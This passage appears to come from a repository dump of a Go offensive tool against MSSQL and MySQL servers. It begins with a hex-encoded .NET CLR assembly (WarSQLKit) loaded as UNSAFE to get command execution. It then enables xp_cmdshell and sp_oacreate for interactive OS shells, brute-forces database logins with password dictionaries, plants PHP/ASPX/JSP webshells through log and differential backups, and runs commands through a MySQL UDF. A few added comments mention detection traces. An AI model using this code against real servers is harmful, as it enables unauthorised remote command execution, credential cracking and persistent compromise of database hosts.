76f1200000a176f1900000a076f1200000a176f1a00000a06731b00000a7d010000040706fe0605000006731c00000a6f1d00000a140c076f1e00000a26076f1f00000a076f2000000a6f2100000a0c076f2200000ade390d280e00000a1b8d160000012516725d000070a2251702a2251803a225197291000070a2251a096f2300000aa2282400000a6f0f00000ade00076f2500000a2d1a280e00000a067b010000046f2600000a6f0f00000a3895000000731b00000a130408281400000a2d091104086f2700000a26067b010000046f2800000a2c20110472970000706f2700000a261104067b010000046f2600000a6f2700000a26280e00000a1c8d16000001251602a2251703a
2251872af000070a22519076f2500000a13051205282900000aa2251a7291000070a2251b1104252d0426142b056f2600000aa2282400000a6f0f00000a067b010000046f2600000a2a011000000000870021a80039100000011e02282a00000a2a4e027b01000004046f2b00000a6f2700000a262a42534a4201000100000000000c00000076322e302e35303732370000000005006c00000038030000237e0000a4030000a804000023537472696e6773000000004c080000e80000002355530034090000100000002347554944000000440900001001000023426c6f620000000000000002000001571502000902000000fa013300160000010000001c000000030000000100000005000000050000002b0000000d000000010000000100000003000000010000000000b1020100000000000600ed01ae0306005a02ae03060038019b030f00ce03000006004c01cd020600d001cd020600b101cd0206004102cd0206000d02cd0206002602cd0206007901cd0206009401cd0206003004c6020a0063014e030e0009049b030600df02c602060020036e0406001d01ae030e00ee039b030a007a044e030a0015014e0306008e02c6020e00f7029b030e00c4009b030e0035039b0306000803360006001503360006002700c602000000002d00000000000100010001001000dd030000350001000100030110000100000035000100040006006404740050200000000096005e007800010080200000000096008b001a00020040220000000086189503060004004022000000008618950306000400482200000000830016007d000400000001007d0000000100e400000002001f04000001002e03000002000404090095030100110095030600190095030a00290095031000310095031000390095031000410095031000490095031000510095031000590095031000610095031000710095030600910095030600a1000c011500a90096001000b10029041a007900950306007900e9022d00b900d7001000b10098043200b90011041000b90085043700b900b4003c00b90078023700b9007b033700b90049043700890095030600c90095034200790066004800790043044e007900ed000600790069035200d900810057007900370406008100a8005700b10029045b0079009b00610069008c025700890001016500890095026100e1008c02570069009503060099004c005700200063000b012e000b0084002e0013008d002e001b00ac002e002300b5002e002b00cb002e003300cb002e003b00cb002e004300d1002e004b00e1002e005300cb002e005b00fe0063006b000b012000048000000100000000000000000000000000a00200000200000000000000000000006b0055000
00000000200000000000000000000006b004000000000000200000000000000000000006b00c60200000000030002000000003c3e635f5f446973706c6179436c617373315f30003c52756e436f6d6d616e643e625f5f3000496e743332003c4d6f64756c653e0053797374656d2e494f0053797374656d2e44617461006765745f44617461006d73636f726c696200436d6445786563006164645f4f757470757444617461526563656976656400636d640052656164546f456e640052756e436f6d6d616e640053656e64006765745f45786974436f6465006765745f4d657373616765007365745f57696e646f775374796c650050726f6365737357696e646f775374796c65007365745f46696c654e616d650066696c656e616d6500426567696e4f7574707574526561644c696e6500417070656e644c696e65006765745f506970650053716c5069706500436f6d70696c657247656e6572617465644174747269627574650044656275676761626c6541747472696275746500417373656d626c795469746c654174747269627574650053716c50726f63656475726541747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7946696c6556657273696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c794465736372697074696f6e41747472696275746500436f6d70696c6174696f6e52656c61786174696f6e7341747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c79436f6d70616e794174747269627574650052756e74696d65436f6d7061746962696c697479417474726962757465007365745f5573655368656c6c4578656375746500546f537472696e67006765745f4c656e6774680057617253514c4b69744d696e696d616c0057617253514c4b69744d696e696d616c2e646c6c0053797374656d0053797374656d2e5265666c656374696f6e00457863657074696f6e006765745f5374617274496e666f0050726f636573735374617274496e666f0053747265616d526561646572005465787452656164657200537472696e674275696c6465720073656e646572004461746152656365697665644576656e7448616e646c6572004d6963726f736f66742e53716c5365727665722e536572766572006765745f5374616e646172644572726f72007365745f52656469726563745374616e646172644572726f72002e63746f720053797374656d2e446961676e6f73746963730053797374656d2e527
56e74696d652e436f6d70696c6572536572766963657300446562756767696e674d6f6465730053746f72656450726f63656475726573004461746152656365697665644576656e744172677300617267730050726f63657373007365745f417267756d656e747300617267756d656e747300436f6e636174004f626a6563740057616974466f7245786974005374617274007365745f52656469726563745374616e646172644f7574707574007374644f75747075740053797374656d2e546578740053716c436f6e74657874007365745f4372656174654e6f57696e646f770049734e756c6c4f72456d707479000000004143006f006d006d0061006e0064002000690073002000720075006e006e0069006e0067002c00200070006c006500610073006500200077006100690074002e00000f63006d0064002e00650078006500000920002f006300200000334f00530020006500720072006f00720020007700680069006c006500200065007800650063007500740069006e006700200000053a002000001753007400640020006f00750074007000750074003a0000372000660069006e00690073006800650064002000770069007400680020006500780069007400200063006f006400650020003d0020000000c1b0e79eb8eb6348be1e0c1d83c2d05800042001010803200001052001011111042001010e04000012550500020e0e0e0c0706120c123d0e1241124508042000125d040001020e0420010102052001011161052002011c180520010112650320000204200012690320000e0500010e1d0e0320000805200112450e08b77a5c561934e08903061245040001010e062002011c124d0801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f7773010801000200000000001501001057617253514c4b69744d696e696d616c00000501000000000f01000a457975702043454c494b00001c010017687474703a2f2f6579757063656c696b2e636f6d2e747200000c010007312e302e302e3000000401000000d82c00000000000000000000f22c0000002000000000000000000000000000000000000000000000e42c0000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000005c03000000000000000000005c0334000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004bc020000010053007400720069006e006700460069006c00650049006e0066006f0000009802000001003000300030003000300034006200300000001a000100010043006f006d006d0065006e007400730000000000000022000100010043006f006d00700061006e0079004e0061006d00650000000000000000004a0011000100460069006c0065004400650073006300720069007000740069006f006e0000000000570061007200530051004c004b00690074004d0069006e0069006d0061006c0000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e00300000004a001500010049006e007400650072006e0061006c004e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c00000000005400180001004c006500670061006c0043006f007000790072006900670068007400000068007400740070003a002f002f006500790075007000630065006c0069006b002e0063006f006d002e007400720000002a00010001004c006500670061006c00540072006100640065006d00610072006b00730000000000000000005200150001004f0072006900670069006e0061006c00460069006c0065006e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c000000000036000b000100500072006f0064007500630074004e0061006d0065000000000045007900750070002000430045004c0049004b0000000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e0030000000380008000100410073007
30065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000043d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" 23 | sqlsstr3 := fmt.Sprintf("CREATE ASSEMBLY [WarSQLKit] AUTHORIZATION [dbo] FROM %s WITH PERMISSION_SET = UNSAFE;", clr) 24 | MssqlCMD(sqlsstr3, conn) 25 | 26 | sqlsstr4 := "CREATE PROCEDURE sp_cmdExec @Command [nvarchar](4000) WITH EXECUTE AS CALLER AS EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec;" 27 | MssqlCMD(sqlsstr4, conn) 28 | return err 29 | } 30 | 31 | // 开启CLR之后获取一个cmd shell 32 | func CMDconsole_CLR(conn *sql.DB) { 33 | 34 | table := Creatable(conn) 35 | 36 | Info("执行系统命令") 37 | reader := bufio.NewReader(os.Stdin) 38 | for { 39 | clrcmd := "EXEC sp_cmdExec " 40 | fmt.Printf("%s:%s> $ ", Rhost, Rport) 41 | cmd, _ := reader.ReadString('\n') 42 | cmd = strings.TrimRight(cmd, "\r\n") 43 | if cmd == "exit" || 
cmd == "q" || cmd == "quit" { 44 | break 45 | } 46 | aa := fmt.Sprintf("%s\"%s >> C:\\\\test11.txt\";", clrcmd, cmd) 47 | Info(aa) 48 | fmt.Println(MssqlCMD(aa, conn)) 49 | 50 | Insertresult(table, conn) 51 | } 52 | } 53 | 54 | // 执行单条命令 55 | func CMDone_CLR(cmd3 string, conn *sql.DB) (err error) { 56 | table := Creatable(conn) 57 | 58 | Info("执行系统命令") 59 | clrcmd := "EXEC sp_cmdExec " 60 | bb := fmt.Sprintf("%s\"%s >> C:\\\\test11.txt\";", clrcmd, cmd3) 61 | Info(bb) 62 | MssqlCMD(bb, conn) 63 | 64 | Insertresult(table, conn) 65 | 66 | return err 67 | } 68 | 69 | func DeleteWarSQLKit(conn *sql.DB) { 70 | Info("删除创建的程序集WarSQLKit") 71 | sqlstr := "DROP PROCEDURE sp_cmdExec;DROP ASSEMBLY [WarSQLKit];" 72 | Info("执行DROP PROCEDURE sp_cmdExec;DROP ASSEMBLY [WarSQLKit];删除程序集") 73 | MssqlCMD(sqlstr, conn) 74 | } 75 | -------------------------------------------------------------------------------- /pac/mssql_cmd.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "bufio" 5 | "database/sql" 6 | "fmt" 7 | "os" 8 | "strings" 9 | "time" 10 | ) 11 | 12 | // 执行sql命令行 13 | func MssqlCMD(sqlstr string, conn *sql.DB) []interface{} { 14 | 15 | stmt, err := conn.Prepare(sqlstr) 16 | if err != nil { 17 | Err(err) 18 | return nil 19 | } 20 | defer stmt.Close() 21 | 22 | rows, err := stmt.Query() 23 | if err != nil { 24 | Err(err) 25 | return nil 26 | } 27 | 28 | cols, _ := rows.Columns() 29 | var colsdata = make([]interface{}, len(cols)) 30 | for i := 0; i < len(cols); i++ { 31 | colsdata[i] = new(interface{}) 32 | } 33 | 34 | for rows.Next() { 35 | rows.Scan(colsdata...) 
//将查到的数据写入到这行中 36 | PrintRow(colsdata) //打印此行 37 | } 38 | defer rows.Close() 39 | return colsdata 40 | } 41 | 42 | func PrintRow(colsdata []interface{}) (err error, result interface{}) { 43 | for _, val := range colsdata { 44 | switch v := (*(val.(*interface{}))).(type) { 45 | case nil: 46 | //fmt.Print("NULL") 47 | case bool: 48 | if v { 49 | fmt.Print("True") 50 | } else { 51 | fmt.Print("False") 52 | } 53 | 54 | case []byte: 55 | fmt.Print(string(v)) 56 | case time.Time: 57 | fmt.Print(v.Format("2022-10-31 19:10:00.999")) 58 | default: 59 | fmt.Print(v) 60 | } 61 | fmt.Println() 62 | } 63 | return err, result 64 | } 65 | 66 | // 循环执行sql语句 67 | func loopMssqlCMD(conn *sql.DB) { 68 | Info("执行mssql命令") 69 | reader := bufio.NewReader(os.Stdin) 70 | for { 71 | fmt.Printf("%s:%s> ", Rhost, Rport) 72 | cmd, _ := reader.ReadString('\n') 73 | cmd = strings.TrimRight(cmd, "\r\n") 74 | if cmd == "exit" || cmd == "q" || cmd == "quit" { 75 | break 76 | } 77 | MssqlCMD(cmd, conn) 78 | } 79 | } 80 | -------------------------------------------------------------------------------- /pac/mssql_connect.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "database/sql" 5 | "fmt" 6 | _ "github.com/denisenkom/go-mssqldb" 7 | "os" 8 | "strings" 9 | ) 10 | 11 | var ( 12 | database = "master" 13 | ) 14 | 15 | func MssqlConnect(Rhost string, Rport string, Ruser string, pwd string) (err error, db *sql.DB, sign bool) { 16 | connString := fmt.Sprintf("server=%s;port%d;database=%s;user id=%s;password=%s", Rhost, Rport, database, Ruser, pwd) 17 | 18 | conn, err := sql.Open("mssql", connString) 19 | if err != nil { 20 | Err(err) 21 | return nil, nil, false 22 | } 23 | 24 | err = conn.Ping() 25 | if err != nil { 26 | Err(err) 27 | return nil, nil, false 28 | } 29 | sign = true 30 | 31 | return err, conn, sign 32 | } 33 | 34 | func MssqlCrack(Rhost string, Rport string) { 35 | Info("开始爆破,请稍等.....") 36 | sign = false 37 | for _, 
user := range Userdict["mssql"] { 38 | for _, pass := range Passwords { 39 | pass = strings.Replace(pass, "{user}", user, -1) 40 | _, _, sign := MssqlConnect(Rhost, Rport, user, pass) 41 | if sign == true { 42 | Success(fmt.Sprintf("账号密码为:%s:%s", user, pass)) 43 | os.Exit(0) 44 | } else { 45 | fmt.Println(fmt.Sprintf("%s:%s 未成功爆破出账号密码", user, pass)) 46 | } 47 | } 48 | } 49 | } 50 | -------------------------------------------------------------------------------- /pac/mssql_spoacreate.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "bufio" 5 | "database/sql" 6 | "fmt" 7 | "os" 8 | "strings" 9 | ) 10 | 11 | // 开启sp_oacreate 12 | func OpenSpoacreate(conn *sql.DB) { 13 | 14 | sqlstr1 := "select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE';" 15 | MssqlCMD(sqlstr1, conn) 16 | Info("select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE';执行正常") 17 | 18 | Info("尝试开启sp_oacreate存储过程") 19 | sqlstr2 := "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;" 20 | MssqlCMD(sqlstr2, conn) 21 | Info("exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;执行正常") 22 | } 23 | 24 | // 开启sp_oacreate之后获取一个cmd shell,回显方法一 25 | func CMDconsole_Spoacreate(conn *sql.DB) { 26 | 27 | table := Creatable(conn) 28 | 29 | Info("执行系统命令") 30 | reader := bufio.NewReader(os.Stdin) 31 | for { 32 | spcmd := "declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,\"c:\\windows\\system32\\cmd.exe /c " 33 | //var cmd string 34 | fmt.Printf("%s:%s> $ ", Rhost, Rport) 35 | cmd, _ := reader.ReadString('\n') 36 | cmd = strings.TrimRight(cmd, "\r\n") 37 | if cmd == "exit" || cmd == "q" || cmd == "quit" { 38 | break 39 | } 40 | //"declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod 
@shell,'run',null,'c:\\windows\\system32\\cmd.exe /c whoami>C:\\\\1a1.txt'" 41 | aa := fmt.Sprintf("%s%s > C:\\\\test11.txt\";", spcmd, cmd) 42 | Info(aa) 43 | MssqlCMD(aa, conn) 44 | Insertresult(table, conn) 45 | } 46 | } 47 | 48 | // 执行单条命令 49 | func CMDone_Spoacreate(cmd1 string, conn *sql.DB) (err error) { 50 | table := Creatable(conn) 51 | 52 | Info("执行系统命令") 53 | spcmd := "declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,\"c:\\windows\\system32\\cmd.exe /c " 54 | aa := fmt.Sprintf("%s%s >> C:\\test11.txt\";", spcmd, cmd1) 55 | Info(aa) 56 | MssqlCMD(aa, conn) 57 | 58 | Insertresult(table, conn) 59 | 60 | return err 61 | } 62 | 63 | // 回显方法二,直接回显 64 | func CMDconsole_Spoacreate_two(conn *sql.DB) { 65 | 66 | Info("执行系统命令") 67 | reader := bufio.NewReader(os.Stdin) 68 | for { 69 | spcmd := "declare @luan int,@exec int,@text int,@str varchar(8000);exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output exec sp_oamethod @luan,'exec',@exec output,'c:\\windows\\system32\\cmd.exe /c " 70 | fmt.Printf("%s:%s> $ ", Rhost, Rport) 71 | cmd, _ := reader.ReadString('\n') 72 | cmd = strings.TrimRight(cmd, "\r\n") 73 | if cmd == "exit" || cmd == "q" || cmd == "quit" { 74 | break 75 | } 76 | aa := fmt.Sprintf("%s%s';exec sp_oamethod @exec, 'StdOut', @text out;exec sp_oamethod @text, 'readall', @str out select @str;", spcmd, cmd) 77 | Info(aa) 78 | MssqlCMD(aa, conn) 79 | } 80 | } 81 | 82 | func CMDone_Spoacreate_two(cmd1 string, conn *sql.DB) (err error) { 83 | Info("执行系统命令") 84 | spcmd := "declare @luan int,@exec int,@text int,@str varchar(8000);exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output exec sp_oamethod @luan,'exec',@exec output,'c:\\windows\\system32\\cmd.exe /c " 85 | aa := fmt.Sprintf("%s%s';exec sp_oamethod @exec, 'StdOut', @text out;exec sp_oamethod @text, 'readall', @str out select @str;", spcmd, cmd) 86 | Info(aa) 87 | MssqlCMD(aa, conn) 88 | return err 89 | } 90 | 
--------------------------------------------------------------------------------
/pac/mssql_webshell.go:
--------------------------------------------------------------------------------
1 | package pac
2 |
3 | import (
4 | 	"database/sql"
5 | 	"fmt"
6 | 	"os"
7 | 	"time"
8 | )
9 | // Choice_two echoes the webshell source to stdout, then hands it to Webshell_logbak (num "1") or Webshell_difshell (num "2"); any other num does nothing. NOTE(review): path is neither a parameter nor a local here, so it presumably resolves to a package-level variable declared in another file; confirm.
10 | func Choice_two(webshell []byte, conn *sql.DB, num string) {
11 | 	fmt.Println(string(webshell))
12 | 	if num == "1" {
13 | 		Webshell_logbak(conn, path, string(webshell))
14 | 	} else if num == "2" {
15 | 		Webshell_difshell(conn, path, string(webshell))
16 | 	}
17 | }
18 | // Choice reads the webshell template for e ("php", "aspx", "asp" or "jsp") from the relative shell\ directory (written with a Windows path separator) and passes it to Choice_two together with num. A read error is reported through Err but does not end the branch: Choice_two still runs with whatever os.ReadFile returned.
19 | func Choice(num string, conn *sql.DB, e string) {
20 | 	if e == "php" {
21 | 		webshell, err := os.ReadFile("shell\\shell.php")
22 | 		if err != nil {
23 | 			Err(err)
24 | 		}
25 | 		Info("php一句话木马,密钥'x'") // message: PHP one-line webshell, key 'x'
26 | 		Choice_two(webshell, conn, num)
27 | 	} else if e == "aspx" {
28 | 		webshell, err := os.ReadFile("shell\\shell.aspx")
29 | 		if err != nil {
30 | 			Err(err)
31 | 		}
32 | 		Info("冰蝎aspx版本webshell") // message: Behinder webshell, aspx variant
33 | 		Choice_two(webshell, conn, num)
34 | 	} else if e == "asp" {
35 | 		webshell, err := os.ReadFile("shell\\shell.asp")
36 | 		if err != nil {
37 | 			Err(err)
38 | 		}
39 | 		Info("冰蝎asp版本webshell") // message: Behinder webshell, asp variant
40 | 		Choice_two(webshell, conn, num)
41 | 	} else if e == "jsp" {
42 | 		webshell, err := os.ReadFile("shell\\shell.jsp")
43 | 		if err != nil {
44 | 			Err(err)
45 | 		}
46 | 		Info("冰蝎jsp版本webshell") // message: Behinder webshell, jsp variant
47 | 		Choice_two(webshell, conn, num)
48 | 	} else {
49 | 		Info("未选择webshell脚本") // message: no webshell script selected
50 | 	}
51 | }
52 | // Webshell_logbak writes webshell to the server-side file path by way of a transaction-log backup (original comment: "log backup getshell"). Each step is a separate MssqlCMD call followed by a fixed sleep.
53 | // It leaves behind a database named by RandStr(6), the table dbo.test7913, and the backup files C://1.bak and c://xxx.bak in addition to path; nothing is dropped or deleted here. MssqlCMD's result is discarded, so every Success line prints even when the statement failed.
54 | func Webshell_logbak(conn *sql.DB, path string, webshell string) {
55 | 	database := RandStr(6)
56 | 	MssqlCMD(fmt.Sprintf("create database %s", database), conn)
57 | 	time.Sleep(time.Duration(2) * time.Second)
58 | 	Success("创建数据库成功!")
59 | 	// Full backup to a fixed path.
60 | 	MssqlCMD(fmt.Sprintf("backup database %s to disk = 'C://1.bak';", database), conn)
61 | 	time.Sleep(time.Duration(1) * time.Second)
62 | 	Success("备份数据库成功!")
63 | 	// Switch the new database to the FULL recovery model.
64 | 	MssqlCMD(fmt.Sprintf("alter database %s set RECOVERY FULL;", database), conn)
65 | 	time.Sleep(time.Duration(1) * time.Second)
66 | 	Success("修改数据库恢复模式为完整模式!")
67 | 	// Scratch table with a single image column for the payload.
68 | 	MssqlCMD(fmt.Sprintf("create table %s.dbo.test7913(a image);", database), conn)
69 | 	time.Sleep(time.Duration(1) * time.Second)
70 | 	Success("创建表成功!")
71 | 	// First log backup, WITH INIT, to a second fixed path.
72 | 	MssqlCMD(fmt.Sprintf("backup log %s to disk = 'c://xxx.bak' with init;", database), conn)
73 | 	time.Sleep(time.Duration(1) * time.Second)
74 | 	Success("备份操作日志成功!")
75 | 	// database and webshell are spliced into the statement with %s; nothing is quoted or parameterised.
76 | 	MssqlCMD(fmt.Sprintf("insert into %s.dbo.test7913(a) values (%s);", database, webshell), conn)
77 | 	time.Sleep(time.Duration(1) * time.Second)
78 | 	Success("插入webshell成功")
79 | 	// The last log backup goes to the caller-supplied path. NOTE(review): for detection, SQL Server records each BACKUP in msdb.dbo.backupset / msdb.dbo.backupmediafamily (physical_device_name) and normally in its error log, so a destination with a script extension or under a web root stands out.
80 | 	MssqlCMD(fmt.Sprintf("backup log %s to disk = '%s';", database, path), conn)
81 | 	Success("Webshell写入成功,请尝试连接!")
82 | }
83 | // Webshell_difshell writes webshell to the server-side file path by way of a differential database backup (original comment: "differential backup getshell").
84 | // It follows the same pattern as Webshell_logbak and leaves a RandStr(6) database, the table dbo.test7913 and C://1.bak behind, with no cleanup and with Success printed regardless of MssqlCMD's outcome.
85 | func Webshell_difshell(conn *sql.DB, path string, webshell string) {
86 | 	database := RandStr(6)
87 | 	MssqlCMD(fmt.Sprintf("create database %s", database), conn)
88 | 	time.Sleep(time.Duration(1) * time.Second)
89 | 	Success("创建数据库成功!")
90 | 	// Full backup to a fixed path; the differential backup below is taken relative to it.
91 | 	MssqlCMD(fmt.Sprintf("backup database %s to disk = 'C://1.bak';", database), conn)
92 | 	time.Sleep(time.Duration(1) * time.Second)
93 | 	Success("备份数据库成功!")
94 | 	// Scratch table with a single image column for the payload.
95 | 	MssqlCMD(fmt.Sprintf("create table %s.[dbo].[test7913] ([cmd] [image]);", database), conn)
96 | 	time.Sleep(time.Duration(1) * time.Second)
97 | 	Success("创建表成功")
98 | 	// database and webshell are spliced into the statement with %s; nothing is quoted or parameterised.
99 | 	MssqlCMD(fmt.Sprintf("insert into %s.dbo.test7913(cmd) values(%s);", database, webshell), conn)
100 | 	time.Sleep(time.Duration(1) * time.Second)
101 | 	Success("插入Webshell成功")
102 | 	// Differential backup to the caller-supplied path; like any BACKUP it is normally recorded in msdb backup history and the SQL Server error log.
103 | 	MssqlCMD(fmt.Sprintf("backup database %s to disk='%s' WITH DIFFERENTIAL,FORMAT;", database, path), conn)
104 | 	time.Sleep(time.Duration(1) * time.Second)
105 | 	Success("Webshell写入成功,请尝试连接!")
106 | }
107 |
--------------------------------------------------------------------------------
/pac/mssql_xpcmdshell.go:
--------------------------------------------------------------------------------
1 | package pac
2 |
3 | import (
4 | 	"bufio"
5 | 	"database/sql"
6 | 	"fmt"
7 | 	"os"
8 | 	"strings"
9 | )
10 | // MssqlXpcmdshell queries sysobjects for xp_cmdshell and then enables it with sp_configure and RECONFIGURE.
11 | // NOTE(review): SQL Server normally writes a "Configuration option ... changed" entry to its error log for each sp_configure change, which is the most direct trace of this step.
12 
| func MssqlXpcmdshell(conn *sql.DB) (err error) { 13 | 14 | sqlstr1 := "select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';" 15 | MssqlCMD(sqlstr1, conn) // 16 | 17 | Info("select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'执行正常") 18 | Info("尝试开启xp_cmdshell") 19 | sqlstr2 := "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;" 20 | res2 := MssqlCMD(sqlstr2, conn) 21 | Info("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;执行正常") 22 | err2, v2 := PrintRow(res2) 23 | fmt.Sprintf("%v", v2) 24 | if err2 != nil { 25 | Err(err2) 26 | } 27 | return err 28 | } 29 | 30 | // 开启xpcmd之后获取一个cmd shell 31 | func MssqlCMDConsole(conn *sql.DB) { 32 | Info("执行系统命令") 33 | reader := bufio.NewReader(os.Stdin) 34 | for { 35 | xpcmd := "exec master..xp_cmdshell " 36 | var cmd string 37 | fmt.Printf("%s:%s> $ ", Rhost, Rport) 38 | cmd, _ = reader.ReadString('\n') 39 | cmd = strings.TrimRight(cmd, "\r\n") 40 | if cmd == "exit" || cmd == "q" || cmd == "quit" { 41 | break 42 | } 43 | 44 | aa := fmt.Sprintf("%s'%s';", xpcmd, cmd) 45 | xpcmd = strings.TrimRight(xpcmd, "\r\n") 46 | Info(aa) 47 | MssqlCMD(aa, conn) 48 | } 49 | } 50 | 51 | // 执行单条命令 52 | func MssqlCMDone(cmd1 string, conn *sql.DB) (err error) { 53 | Info("执行系统命令") 54 | xpcmd := "exec master..xp_cmdshell " 55 | xpcmd = xpcmd + "\"" + cmd1 + "\"" + ";" 56 | xpcmd = strings.TrimRight(xpcmd, "\r\n") 57 | Info(xpcmd) 58 | MssqlCMD(xpcmd, conn) 59 | return err 60 | } 61 | -------------------------------------------------------------------------------- /pac/mysql_cmd.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "bufio" 5 | "database/sql" 6 | "fmt" 7 | "log" 8 | "os" 9 | "strings" 10 | ) 11 | 12 | func MysqlCMD(sqlstr string, conn *sql.DB) ([]map[string]interface{}, error) { 13 | rows, err := 
conn.Query(sqlstr) 14 | 15 | if err != nil { 16 | log.Println(err) 17 | return nil, err 18 | } 19 | defer rows.Close() 20 | 21 | // 数据列 22 | columns, err := rows.Columns() 23 | if err != nil { 24 | log.Println(err) 25 | return nil, err 26 | } 27 | 28 | count := len(columns) 29 | 30 | mData := make([]map[string]interface{}, 0) 31 | values := make([]interface{}, count) 32 | valPointers := make([]interface{}, count) 33 | for rows.Next() { 34 | for i := 0; i < count; i++ { 35 | valPointers[i] = &values[i] 36 | } 37 | 38 | rows.Scan(valPointers...) 39 | 40 | entry := make(map[string]interface{}) 41 | 42 | for i, col := range columns { 43 | var v interface{} 44 | 45 | val := values[i] 46 | b, ok := val.([]byte) 47 | if ok { 48 | v = string(b) 49 | } else { 50 | v = val 51 | } 52 | entry[col] = v 53 | } 54 | 55 | mData = append(mData, entry) 56 | } 57 | return mData, nil 58 | } 59 | 60 | // 循环执行sql语句 61 | func loopMysqlCMD(conn *sql.DB) { 62 | Info("执行mysql命令") 63 | reader := bufio.NewReader(os.Stdin) 64 | for { 65 | fmt.Printf("%s:%s> ", Rhost, Rport) 66 | cmd, _ := reader.ReadString('\n') 67 | cmd = strings.TrimRight(cmd, "\r\n") 68 | if cmd == "exit" || cmd == "q" || cmd == "quit" { 69 | break 70 | } 71 | result, err := MysqlCMD(cmd, conn) 72 | 73 | if err != nil { 74 | Info("循环执行sql语句报错") 75 | } 76 | for i, _ := range result { 77 | for _, w := range result[i] { 78 | fmt.Println(w) 79 | } 80 | } 81 | } 82 | } 83 | 84 | func MysqlCMDConsole(conn *sql.DB) { 85 | Info("执行系统命令") 86 | reader := bufio.NewReader(os.Stdin) 87 | for { 88 | udfcmd := "select sys_eval(\"" 89 | var cmd string 90 | fmt.Printf("%s:%s> $ ", Rhost, Rport) 91 | cmd, _ = reader.ReadString('\n') 92 | cmd = strings.TrimRight(cmd, "\r\n") 93 | if cmd == "exit" || cmd == "q" || cmd == "quit" { 94 | break 95 | } 96 | aa := fmt.Sprintf("%s%s\");", udfcmd, cmd) 97 | Info(aa) 98 | result, err := MysqlCMD(aa, conn) 99 | if err != nil { 100 | Info("循环执行命令报错") 101 | } 102 | for i, _ := range result { 103 | for _, 
w := range result[i] { 104 | fmt.Println(w) 105 | } 106 | } 107 | } 108 | } 109 | -------------------------------------------------------------------------------- /pac/mysql_connect.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "database/sql" 5 | "fmt" 6 | _ "github.com/go-sql-driver/mysql" 7 | "os" 8 | "strings" 9 | ) 10 | 11 | func MysqlConnect(Ruser string, Rhost string, PWD string, Rport string) (err error, conn *sql.DB, sign bool) { 12 | Info("账号密码正确但无法连接可能是因为目标没有开启远程连接") 13 | dsn := fmt.Sprintf("%s:%s@tcp(%s:%s)/information_schema?charset=gbk&parseTime=True", Ruser, PWD, Rhost, Rport) 14 | conn, err = sql.Open("mysql", dsn) 15 | if err != nil { 16 | Err(err) 17 | return nil, nil, false 18 | } 19 | err = conn.Ping() 20 | if err != nil { 21 | Err(err) 22 | return nil, nil, false 23 | } 24 | fmt.Println("连接数据库成功!") 25 | sign = true 26 | return nil, conn, sign 27 | } 28 | 29 | func MysqlCrack(Rhost string, Rport string) { 30 | Info("开始爆破,请稍等.....") 31 | sign = false 32 | for _, user := range Userdict["mysql"] { 33 | for _, pass := range Passwords { 34 | pass = strings.Replace(pass, "{user}", user, -1) 35 | 36 | _, _, sign := MysqlConnect(user, Rhost, pass, Rport) 37 | if sign == true { 38 | 